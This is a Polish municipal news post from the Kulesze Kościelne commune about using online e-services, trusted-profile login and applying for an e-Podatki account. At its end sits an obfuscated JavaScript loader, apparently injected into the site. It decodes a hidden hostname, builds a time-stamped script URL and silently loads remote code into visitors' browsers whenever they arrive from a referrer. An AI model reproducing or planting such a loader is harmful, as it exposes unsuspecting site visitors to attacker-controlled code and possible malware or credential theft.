Aktualności

e-usługi na portalu ipodlaskie.pl – zaproś urząd do swego domu!

mar 20, 2024 | Aktualności

Od teraz możesz załatwiać sprawy urzędowe za pośrednictwem serwisu e-usług Urzędu Gminy Kulesze Kościelne lub aplikacji mobilnych.

Aplikacje mobilne oraz więcej informacji o e-usługach znajdziesz w sklepie Google Play, AppStore oraz na portalu ipodlaskie.pl

Jak zacząć:

Przejdź do serwisu e-usługi gminy Kulesze Kościelne

wybierz interesującą cię usługę, np. deklarację podatkową

Zaloguj się za pomocą swojego profilu zaufanego w celu założenia profilu w naszym serwisie

Zaloguj się za pomocą swojego profilu zaufanego w celu założenia profilu w naszym serwisie

Po uzupełnieniu danych w formularzu rejestracyjnym będziesz mógł rozpocząć korzystanie z serwisu.

Osoby nie posiadające profilu zaufanego również mogą założyć konto w serwisie.

Warunkiem koniecznym do korzystania z Portalu jest posiadanie adresu email i złożenie do Urzędu wniosku wraz ze wskazaniem adresu mailowego o utworzenie konta na Platformie e-Podatki oraz uzyskanie loginu i hasła, niezbędnych do logowania.

Wypełniony Wniosek złożysz w Urzędzie:
– osobiście,
– poprzez pełnomocnika,
– elektronicznie – za pośrednictwem platformy ePUAP, wybierając usługę Pismo Ogólne oraz załączając Wniosek podpisany -elektronicznie podpisem kwalifikowanym lub podpisem zaufanym.
Pełnomocnik jest obowiązany do przedłożenia oryginału pełnomocnictwa szczególnego, którego wzór określa rozporządzenie Ministra Finansów z dnia 28 grudnia 2015 r. w sprawie wzorów pełnomocnictwa szczególnego i pełnomocnictwa do doręczeń oraz wzorów zawiadomienia o zmianie, odwołaniu lub wypowiedzeniu tych pełnomocnictw (Dz. U. z 2018 r. poz. 974) /wraz z należną opłatą skarbową/, upoważniającego do złożenia Wniosku.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);